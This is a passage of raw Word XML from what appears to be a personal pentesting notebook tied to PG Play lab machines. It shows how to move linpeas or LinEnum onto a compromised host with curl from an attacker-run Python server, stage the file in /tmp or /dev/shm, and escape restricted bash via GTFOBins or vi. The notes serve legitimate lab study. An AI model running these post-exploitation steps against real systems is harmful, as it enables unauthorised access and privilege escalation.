      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003416">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, you want to move something to a target machine after getting a reverse shell, like a LinEnum.sh file. But, you can't curl the .sh file from inside the target machine. So, you can locally host the file through python, and then curl that from the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003417">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linenum.sh [insert URL]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003418">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace linenum.sh with your desired name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003419">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this LOCALLY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Within the same directory where you ran the above, open a python server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;your_local_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:8000/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linenum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From within the target machine, run this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, you don't have write permissions inside a directory. A good place to try is /tmp since most users have write permissions there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or /dev/shm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003420">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the desired name you want</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003421">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linenum.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the name of the file you got locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003422">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003423">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need the file to be executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003424">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003425">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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27">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k1qvicbmloc6" w:id="469"/>
      <w:bookmarkEnd w:id="469"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rbash (restricted bash)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003428">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003429">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a </w:t>
      </w:r>
      <w:hyperlink r:id="rId1132">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1133">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://0xffsec.com/handbook/shells/restricted-shells/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42A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rbash is bash but in restricted mode. It still uses /bin/bash, but just in restricted mode. This was first introduced to me in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1134">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1135">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Peppo</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42E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check what commands you can run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003430">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003431">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First look at your PATH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003432">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo $PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003433">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="552"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see something like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/&lt;user&gt;/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003434">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can tell you are in rbash when you aren't able to run a lot of commands. To see which commands you can run, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003435">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="875"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /home/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003436">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="875"/>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michael</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the username of the user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003437">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003438">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see "vi" after running this command above, then you can use vi to escape rbash (look at the subsection below). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003439">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If not, then you can try the SSH method if you have SSH access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pw4nahmigyer" w:id="470"/>
      <w:bookmarkEnd w:id="470"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaping restricted shell tips</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /home/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;user&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you see all the binaries you have access to. Look up those binaries on GTFOBins, and look at the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">section of GTFOBins in order to use it to escape rbash and get a fully interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This method was seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1136">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Peppo</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440">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003441">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
